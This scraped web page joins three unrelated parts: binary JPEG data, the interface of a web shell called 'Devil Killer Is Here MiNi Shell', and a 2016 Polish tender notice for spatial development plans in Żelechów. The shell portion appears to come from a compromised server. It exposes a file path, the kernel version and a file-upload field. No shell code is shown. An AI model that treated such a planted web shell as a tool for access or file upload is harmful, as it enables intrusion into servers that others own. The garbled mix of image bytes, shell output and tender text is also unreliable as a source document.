JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20160725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20160725/155401-N-2016.html

<p class="kh_header"><b>Żelechów: Wykonanie miejscowego planu zagospodarowania przestrzennego miasta i gminy Żelechów</b><br>
<b>Numer ogłoszenia: 155401 - 2016; data zamieszczenia: 25.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Żelechowie , ul. Piłsudskiego 47, 08-430 Żelechów, woj. mazowieckie, tel. 25 754 11 44, faks 25 754 11 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zelechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie miejscowego planu zagospodarowania przestrzennego miasta i gminy Żelechów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w trybie przetargu nieograniczonego jest Wykonanie miejscowego planu zagospodarowania przestrzennego miasta i gminy Żelechów.
Przedmiot zamówienia został podzielony na 2 części:
- Część 1: Sporządzenie miejscowego planu zagospodarowania przestrzennego miasta i gminy Żelechów (etap I).
Przedmiotem zamówienia jest wykonanie zmian miejscowych  planów zagospodarowania przestrzennego:
-	Miasta Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie nr XIX/131/05 z dnia 15 lutego 2005r. (ogł. Dz. Urzędowy Województwa Mazowieckiego Nr 66, poz.1725 z dnia 29 marca 2005r.);
-	Miasta Żelechów uchwalonego Uchwałą Nr X/64/2015 Rady Miejskiej w Żelechowie z dnia 17 września 2015r. (ogł. Dz. Urz. Woj. Mazowieckiego z dnia 13.11.2015r. poz. 9051).
-	Miasta Żelechów - Rynek z przyległymi ulicami uchwalonym Uchwałą Rady Miejskiej w Żelechowie nr XXXI/250/13 z dnia 18 marca 2013r. (ogł. Dz. Urzędowy Województwa Mazowieckiego z 2013r. poz. 5912 z dnia 27.05.2013r.)  
które stanowią realizację uchwały Nr XX/133/2016 Rady Miejskiej w Żelechowie z dnia 16 czerwca 2016r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego miasta Żelechów,

oraz

- Gminy Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie nr XIV/93/04 z dnia 7 kwietnia 2004r. (ogł. Dz. Urzędowy Województwa Mazowieckiego Nr 133, poz.3277 z dnia 03 czerwca 2004r.)
- miejscowego planu zagospodarowania przestrzennego dla części obrębów geodezyjnych Stary Goniwilk, Kalinów, Nowy Goniwilk, Piastów, Władysławów w gminie Żelechów uchwalonym uchwałą Rady Miejskiej w Żelechowie nr LII/370/14 z dnia 30 października 2014r. /ogł. Dz. Urz. Woj. Mazowieckiego, poz. 10606 z dnia 24 listopada 2014r./
które stanowią realizację uchwały Nr XX/135/2016 Rady Miejskiej w Żelechowie z dnia 16 czerwca 2016r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego gminy Żelechów.


Zakres zmiany miejscowego planu zagospodarowania przestrzennego, określony uchwałą intencyjną Nr XX/133/2016 obejmuje opracowanie mpzp  dla obszaru fragmentu miasta Żelechów w kierunku południowym od ulicy Długiej. Obszar objęty zmianą  wynosi  ok. 800 ha.

Zakres zmiany miejscowego planu zagospodarowania przestrzennego, określony uchwałą intencyjną Nr XX/135/2016 obejmuje opracowanie mpzp  dla  obrębów geodezyjnych Huta Żelechowska, Zakrzówek, Kotłówka, Janówek, Nowy Kębłów, Stary Kębłów, Stefanów, Sokolniki,  Władysławów w gminie Żelechów.
Obszar objęty zmianą  wynosi  ok. 4351 ha ( w granicach administracyjnych  obrębów geodezyjnych Huta Żelechowska, Zakrzówek, Kotłówka, Janówek, Nowy Kębłów, Stary Kębłów, Stefanów, Sokolniki,  Władysławów w gminie Żelechów).

	Przedmiot zamówienia powinien być wykonany zgodnie z obowiązującymi przepisami ( co do zakresu  i formy  oraz procedury wykonania), z uwzględnieniem wymogów określonych w  ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2016 r. poz. 778) oraz przepisów wykonawczych w tym rozporządzenia  Ministra Infrastruktury z  dnia 26 sierpnia 2003 r. w  sprawie zakresu  projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587) wraz z przeprowadzeniem strategicznej oceny  oddziaływania na środowisko, zgodnie z przepisami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z  2016 r. poz.353).

Plan opracować stosownie do art. 16  w/w ustawy o planowaniu i zagospodarowaniu przestrzennym  na kopiach map zasadniczych albo w przypadku ich braku na mapach katastralnych,  gromadzonych w państwowym  zasobie geodezyjnym i kartograficznym.
Wymagana skala części graficznej planu: zgodnie z obowiązującymi przepisami.
Zamawiający pozyskał w kwietniu 2016 roku mapy ewidencyjne gruntów i budynków w wersji elektronicznej w postaci wektorowej w rozszerzeniu .dxf w skali 1:1000 dla obszaru miasta i gminy Żelechów. Ponadto w lipcu 2017 roku Zamawiający wystąpił do Starosty Powiatu Garwolińskiego z wnioskiem o udostępnienie danych zgromadzonych w rejestrze publicznym dot. map ewidencyjnych w skali 1:2000 w wersji elektronicznej w postaci wektorowej w rozszerzeniu .dxf dla obszaru gminy Żelechów oraz map ewidencyjnych w skali 1:1000 w wersji elektronicznej dla miasta Żelechów.

Wszelkie prace projektowe lub czynności nie opisane niżej, a wynikające z procedur określonych w ustawie o planowaniu i zagospodarowaniu przestrzennym oraz przepisach szczególnych, niezbędne do właściwego i kompleksowego opracowania dokumentacji projektowej, należy traktować jako oczywiste i uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia.      
W ramach sporządzenia przedmiotu zamówienia Wykonawca uwzględni ewentualne zmiany przepisów prawa i dostosuje do nich opracowania, będące przedmiotem umowy, w ramach zawartej umowy i ceny ofertowej.

	Konieczność zmiany planu wynika z potrzeby uwzględnienia wniosków o zmianę planu, aktualizacji rozwiązań przestrzennych i przeznaczenia terenów dostosowując je do obecnych potrzeb.
 	Zapisy obowiązujących miejscowych planów zagospodarowania przestrzennego, nie obejmują wszystkich obligatoryjnych ustaleń występujących na obszarze objętym planem zgodnie z obowiązującą ustawą, dlatego też podejmowane są działania zmierzające do aktualizacji planów zgodnie z obowiązującą ustawą oraz zgodnie ze zmianami przeznaczenia i zagospodarowania terenów wyznaczonych w studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta i gminy Żelechów.

Do projektu planu należy wykonać:
1/opracowanie ekofizjograficzne dla terenu objętego zmianą planu.
2/Opracowanie projektu  planu.
3/Opracowanie prognozy oddziaływania na środowisko zgodnie z ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U z 2016 r. poz. 353) oraz podsumowania i uzasadnienia w ramach przeprowadzenia strategicznej oceny oddziaływania na środowisko, o których mowa w art. 42 i art. 55 ust. 3 w/w ustawy.
4/prognozę skutków finansowych uchwalenia planu.

Wykonawca opracuje i przekaże Zamawiającemu materiały planistyczne oraz materiały projektu planu na poszczególnych etapach opracowania, w ilościach niezbędnych dla prawidłowego przeprowadzenia procedury formalno-prawnej sporządzania planu.

Wykonawca jest zobowiązany do:
- przygotowania projektów korespondencji, wykazów i innych dokumentów, których potrzeba wyłoni się w trakcie opracowania zmiany planu,
-przygotowania ogłoszenia do prasy miejscowej oraz obwieszczenia o podjęciu uchwały  o przystąpieniu do sporządzenia planu zagospodarowania  przestrzennego, określając   formę , miejsce i termin  składania wniosków,
-przygotowania zawiadomienia na piśmie o podjęciu uchwały o przystąpieniu do sporządzania planu zagospodarowania przestrzennego  dla instytucji i organów  właściwych do uzgadniania i opiniowania  projektu planu wraz z wykazem instytucji i organów i ich danymi adresowymi,
-dokonania oceny istniejącego stanu zagospodarowania, charakteru istniejącej zabudowy;
-rozpatrzenia   wniosków  i uwag o których mowa w art. 17 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym i art. 55 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku I jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko  (Dz. U z 2016 r. poz.353),
-sporządzenia  projektu  w/w miejscowego planu  wraz z prognozą  oddziaływania na środowisko uwzględniając ustalenia zawarte w Studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów,
-sporządzenia prognozy skutków finansowych uchwalenia przedmiotowego planu z uwzględnieniem art. 36 uopizp,
-uzyskania od gminnej komisji urbanistyczno-architektonicznej opinii o projekcie miejscowego planu  zagospodarowania przestrzennego oraz uzyskania od wójtów, burmistrzów gmin i prezydenta miasta, graniczących z obszarem objętym planem, w zakresie rozmieszczenia inwestycji celu publicznego o znaczeniu lokalnym,
-przygotowania wystąpień o opinie i uzgodnienia dot. projektu  planu do właściwych  instytucji i organów, przygotowanie wykazu instytucji i organów wraz z  ich danymi adresowymi),
-na etapie opiniowania i uzgadniania projektu planu wykonawca  przekaże projekt dokumentu w ilości i formie niezbędnej do sprawnego przeprowadzenia procedury uzyskania opinii i uzgodnień wynikających z przepisów prawa;
-opracowanie wniosku o zgodę na zmianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze i nieleśne,   w przypadku gdy teren objęty zmianą planu takiej zgody nie posiada.
-wprowadzenia zmian wynikających z uzyskanych opinii i uzgodnień,
-przygotowania  ogłoszenia i obwieszczenia  o wyłożeniu projektu  do publicznego  wglądu wraz z prognozą oddziaływania na środowisko oraz zorganizowania w tym czasie dyskusji publicznej nad przyjętymi  w projekcie planu rozwiązaniami z jednoczesnym określeniem  terminu, w którym osoby prawe i fizyczne  oraz  jednostki  organizacyjne   będą  mogły  wnieść  uwagi do projektu planu. Ustalenie  w/w  terminów  po dokonaniu uzgodnień  z Zamawiającym. Na etapie wyłożenia projektu planu do publicznego wglądu wykonawca  przekaże projekt dokumentu w formie kolorowych wydruków+ 1 egz. w wersji elektronicznej,
-uczestniczenia, przeprowadzenia i pełnej obsługi wyłożenia projektu do publicznego wglądu. Obsługa  wyłożenia  powinna  zapewnić  sprawne  przeprowadzenie tego  etapu  procedury,
-przygotowanie projektu rozpatrzenia uwag po zakończeniu okresu wyłożenia planu,  
-wprowadzenia zmian do projektu planu wynikających z rozpatrzenia uwag a następnie w niezbędnym zakresie ponowienia uzgodnień,
-przygotowania kompletu projektu materiałów planistycznych w ilości 16 kpl. (w wersji papierowej dopuszcza się odpowiednie zmniejszenie rysunku planu do skali zapewniającej  czytelność) celem przekazania Radnym Rady Miejskiej na posiedzenie Komisji opiniujących projekt planu,
-przedstawienia Radzie Miejskiej projektu planu wraz z listą nieuwzględnionych uwag i uzasadnieniem.
-Przygotowania kompletu materiałów dot. uchwalenia projektu planu wraz z uzasadnieniem dla  Burmistrza  w celu   przedstawienia   Radzie Miejskiej .
-udział  w posiedzeniach  Komisji  i Sesjach  Rady Miejskiej oraz innych  spotkaniach, których  konieczność wyniknie w trakcie  procedury. Wykonawca jest zobowiązany do wyjaśnienia rozwiązań dotyczących projektu i zawartych w nim opracowań,
-przygotowanie dokumentacji formalno - prawnej w formie książkowej, obejmującej problematykę wymaganą przez Wojewodę w celu oceny zgodności z prawem,
-wprowadzenie do uchwały zatwierdzającej miejscowy plan zmian wynikających z rozstrzygnięć nadzorczych Wojewody (ewentualnie powtórzenie procedury w wymaganym przez Wojewodę zakresie),
-w przypadku ponowienia procedury - ponowne opracowanie niezbędnych dokumentów i ponowienie niezbędnych czynności, udział w czynnościach niezbędnych do ewentualnego doprowadzenia mpzp do zgodności z przepisami; ;
- sporządzenia wykazu dotyczącego łącznej powierzchni przeznaczenia terenów w uchwalonym miejscowym planie zagospodarowania przestrzennego (ha i %) w rozbiciu na: - powierzchnię miejscowego planu zagospodarowania przestrzennego - ogółem, - powierzchnię: zabudowy ogółem, zabudowy wielorodzinnej, zabudowy usługowej ogółem, usług publicznych, terenów użytkowanych rolniczo ogółem, zabudowy zagrodowej, zabudowy techniczno-produkcyjnej, zieleni i wód, komunikacji, infrastruktury technicznej, łączną powierzchnię terenów, dla których zmieniono przeznaczenie gruntów rolniczych na cele nierolnicze oraz gruntów leśnych na cele nieleśne.
-wszystkie uzgodnienia pomiędzy Wykonawcą, a Zamawiającym dotyczące przedmiotu zamówienia w trakcie jego realizacji , należy dokonywać na piśmie w formie notatki  służbowej.
Nie należy wyceniać kosztów związanych z publikacją ogłoszeń i prowadzoną korespondencją wynikającą z procedury planistycznej.  	
	Opracowanie należy sporządzić w oparciu o ustalenia Studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów.
Stopień zgodności przewidywanych rozwiązań planu z ustaleniami studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie Nr LI/367/14 z dnia 30 września 2014r.
	Opracowanie miejscowego planu zagospodarowania przestrzennego dla wskazanych obszarów będzie musiało być poprzedzone sporządzeniem w części zmiany obowiązującego studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie Nr LI/367/14 z dnia 30 września 2014r. W dniu 9 lipca 2015r. Rada Miejska w Żelechowie podjęła  uchwałę Nr VIII/62/2015 w sprawie przystąpienia do sporządzenia zmiany obowiązującego studium.
Obecnie trwa procedura planistyczna zmiany studium. Należy przyjąć, iż obszerny zakres regulacji studium z uwagi na dość ogólną konstrukcję swoich ustaleń pozwala na  zachowanie uniwersalnej zgodności  w stosunku do projektowanych rozwiązań w planie miejscowym - podstawowe przeznaczenie terenu proponowane w projekcie planu miejscowego będzie zgodne z polityką przestrzenną określoną w studium. Ponadto rozwiązania zaproponowane w projekcie planu nie będą naruszały ustaleń studium w zakresie: racjonalnego gospodarowania przestrzenią, ochrony środowiska przyrodniczego,ochrony środowiska kulturowego, rozbudowy i modernizacji systemu transportowo - komunikacyjnego, rozwoju systemów infrastruktury technicznej i komunalnej, itp.
Po uchwaleniu - studium dopuszczać będzie realizację planowanych zamierzeń inwestycyjnych, dlatego też ustalenia  planu miejscowego nie będą naruszać ustaleń studium.	
Dokumentacja zostanie przekazana przez Wykonawcę w następujących ilościach:
-	kompletną uchwałę w sprawie uchwalenia miejscowego planu zagospodarowania przestrzennego wraz z załącznikami zawierającymi część tekstową i graficzną w formie papierowej w 6 egzemplarzach ; wydruki części graficznej kolorowe  oraz wersję  elektroniczną na płycie CD - 5 egz.
-	opracowanie ekofizjograficzne ( po 3 egz. wydruku w kolorze i 3 egz. w wersji elektronicznej);
-	rysunek planu  w kolorze w formie książkowej (1 egz.) zalaminowany, podzielony na sekcje w formacie A3 z zachowaniem skali rysunku planu ;
-	prognoza oddziaływania na środowisko - (po 3 egz. wydruku w kolorze i 3 egz. w wersji elektronicznej);
-	prognoza skutków finansowych( po 3 egz. wydruku w kolorze i 3 egz. w wersji elektronicznej);
-	1  egzemplarz kolorowej planszy rysunku planu pomniejszony do skali 1:5 000 do zawieszenia na ścianie dwustronnie zalaminowany i oprawiony w listwy.

Uchwała powinna być też dodatkowo przekazana w formacie XML-EDAP celem publikacji w Dzienniku Urzędowym Województwa Mazowieckiego.
Dodatkowo w/w dane planistyczne należy opracować w sposób opisany szczegółowo w dokumencie Standardy Zapisu Dokumentów Planistycznych w celu zasilenia aplikacji Rejestr Planów. Standardy Zapisu Dokumentów Planistycznych będą stanowić załącznik do umowy.

Wykonawca przeniesie na Zamawiającego (bez odrębnego wynagrodzenia) własność oryginałów utworów wykonywanych w ramach umowy oraz majątkowych praw autorskich  do nich na następujących polach eksploatacji:
a) zrealizowanie , w tym również przez osoby trzecie;
b) wykonywanie zależnych praw autorskich , w szczególności zezwolenie na korzystanie utworów zależnych;
c) trwałe lub czasowe zwielokrotnienie utworów techniką drukarską, reprograficzną, zapis magnetycznego oraz techniką cyfrową;
d) wprowadzanie utworów do obrotu, użyczenie lub najem oryginału albo powielonych egzemplarzy, w szczególności wykorzystanie w trakcie prowadzonych robót   budowlanych  i procedur związanych z ich   przeprowadzaniem;
e) publiczne wykonywanie, wystawienie, wyświetlenie , odtworzenie oraz publiczne udostępnienie utworów  taki sposób , aby każdy mógł mieć  do niego  dostęp w miejscu i w czasie przez siebie wybranym.

- Część 2: Sporządzenie miejscowego planu zagospodarowania przestrzennego miasta i gminy Żelechów (etap II).
Przedmiotem zamówienia jest wykonanie zmian miejscowych  planów zagospodarowania przestrzennego:
-	Miasta Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie nr XIX/131/05 z dnia 15 lutego 2005r. (ogł. Dz. Urzędowy Województwa Mazowieckiego Nr 66, poz.1725 z dnia 29 marca 2005r.);
-	Miasta Żelechów uchwalonego Uchwałą Nr X/64/2015 Rady Miejskiej w Żelechowie z dnia 17 września 2015r. (ogł. Dz. Urz. Woj. Mazowieckiego z dnia 13.11.2015r. poz. 9051).
-	Miasta Żelechów, teren zabytkowego parku dworskiego uchwalonego Uchwałą nr XXVII/191/10 Rady Miejskiej w Żelechowie z dnia 18 marca 2010r. (ogł. Dz. Urz. Woj. Mazowieckiego  nr 123, poz. 2713 z 22.06.2010r.).
które stanowią realizację uchwały Nr XX/134/2016 Rady Miejskiej w Żelechowie z dnia 16 czerwca 2016r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego miasta Żelechów,
oraz
- Gminy Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie nr XIV/93/04 z dnia 7 kwietnia 2004r. (ogł. Dz. Urzędowy Województwa Mazowieckiego Nr 133, poz.3277 z dnia 03 czerwca 2004r.)
- miejscowego planu zagospodarowania przestrzennego dla części obrębów geodezyjnych Stary Goniwilk, Kalinów, Nowy Goniwilk, Piastów, Władysławów w gminie Żelechów uchwalonym uchwałą Rady Miejskiej w Żelechowie nr LII/370/14 z dnia 30 października 2014r. /ogł. Dz. Urz. Woj. Mazowieckiego, poz. 10606 z dnia 24 listopada 2014r./
które stanowią realizację uchwały Nr XX/136/2016 Rady Miejskiej w Żelechowie z dnia 16 czerwca 2016r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego gminy Żelechów.
Zakres zmiany miejscowego planu zagospodarowania przestrzennego, określony uchwałą intencyjną Nr XX/134/2016 obejmuje opracowanie mpzp  dla obszaru fragmentu miasta Żelechów w kierunku północnym od ulicy Długiej. Obszar objęty zmianą  wynosi  ok. 413 ha.
Zakres zmiany miejscowego planu zagospodarowania przestrzennego, określony uchwałą intencyjną Nr XX/136/2016 obejmuje opracowanie mpzp  dla  obrębów geodezyjnych Gózdek, Łomnica, Nowy Goniwilk, Stary Goniwilk, Kalinów, Piastów, Wola Żelechowska  w gminie Żelechów.
Obszar objęty zmianą  wynosi  ok. 3189 ha ( w granicach administracyjnych  obrębów geodezyjnych Gózdek, Łomnica, Nowy Goniwilk, Stary Goniwilk, Kalinów, Piastów, Wola Żelechowska w gminie Żelechów).
	Przedmiot zamówienia powinien być wykonany zgodnie z obowiązującymi przepisami ( co do zakresu  i formy  oraz procedury wykonania), z uwzględnieniem wymogów określonych w  ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2016 r. poz. 778) oraz przepisów wykonawczych w tym rozporządzenia  Ministra Infrastruktury z  dnia 26 sierpnia 2003 r. w  sprawie zakresu  projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587) wraz z przeprowadzeniem strategicznej oceny  oddziaływania na środowisko, zgodnie z przepisami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z  2016 r. poz.353).

Plan opracować stosownie do art. 16  w/w ustawy o planowaniu i zagospodarowaniu przestrzennym  na kopiach map zasadniczych albo w przypadku ich braku na mapach katastralnych,  gromadzonych w państwowym  zasobie geodezyjnym i kartograficznym.
Wymagana skala części graficznej planu: zgodnie z obowiązującymi przepisami.
Zamawiający pozyskał w kwietniu 2016 roku mapy ewidencyjne gruntów i budynków w wersji elektronicznej w postaci wektorowej w rozszerzeniu .dxf w skali 1:1000 dla obszaru miasta i gminy Żelechów. Ponadto w lipcu 2017 roku Zamawiający wystąpił do Starosty Powiatu Garwolińskiego z wnioskiem o udostępnienie danych zgromadzonych w rejestrze publicznym dot. map ewidencyjnych w skali 1:2000 w wersji elektronicznej w postaci wektorowej w rozszerzeniu .dxf dla obszaru gminy Żelechów oraz map ewidencyjnych w skali 1:1000 w wersji elektronicznej dla miasta Żelechów.

Wszelkie prace projektowe lub czynności nie opisane niżej, a wynikające z procedur określonych w ustawie o planowaniu i zagospodarowaniu przestrzennym oraz przepisach szczególnych, niezbędne do właściwego i kompleksowego opracowania dokumentacji projektowej, należy traktować jako oczywiste i uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia.      
W ramach sporządzenia przedmiotu zamówienia Wykonawca uwzględni ewentualne zmiany przepisów prawa i dostosuje do nich opracowania, będące przedmiotem umowy, w ramach zawartej umowy i ceny ofertowej.

	Konieczność zmiany planu wynika z potrzeby uwzględnienia wniosków o zmianę planu, aktualizacji rozwiązań przestrzennych i przeznaczenia terenów dostosowując je do obecnych potrzeb.
 	Zapisy obowiązujących miejscowych planów zagospodarowania przestrzennego, nie obejmują wszystkich obligatoryjnych ustaleń występujących na obszarze objętym planem zgodnie z obowiązującą ustawą, dlatego też podejmowane są działania zmierzające do aktualizacji planów zgodnie z obowiązującą ustawą oraz zgodnie ze zmianami przeznaczenia i zagospodarowania terenów wyznaczonych w studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta i gminy Żelechów.

Do projektu planu należy wykonać:
1/opracowanie ekofizjograficzne dla terenu objętego zmianą planu.
2/Opracowanie projektu  planu.
3/Opracowanie prognozy oddziaływania na środowisko zgodnie z ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U z 2016 r. poz. 353) oraz podsumowania i uzasadnienia w ramach przeprowadzenia strategicznej oceny oddziaływania na środowisko, o których mowa w art. 42 i art. 55 ust. 3 w/w ustawy.
4/prognozę skutków finansowych uchwalenia planu.

Wykonawca opracuje i przekaże Zamawiającemu materiały planistyczne oraz materiały projektu planu na poszczególnych etapach opracowania, w ilościach niezbędnych dla prawidłowego przeprowadzenia procedury formalno-prawnej sporządzania planu.

-Wykonawca jest zobowiązany do:
- przygotowania projektów korespondencji, wykazów i innych dokumentów, których potrzeba wyłoni się w trakcie opracowania zmiany planu,
-przygotowania ogłoszenia do prasy miejscowej oraz obwieszczenia o podjęciu uchwały  o przystąpieniu do sporządzenia planu zagospodarowania  przestrzennego, określając   formę , miejsce i termin  składania wniosków,
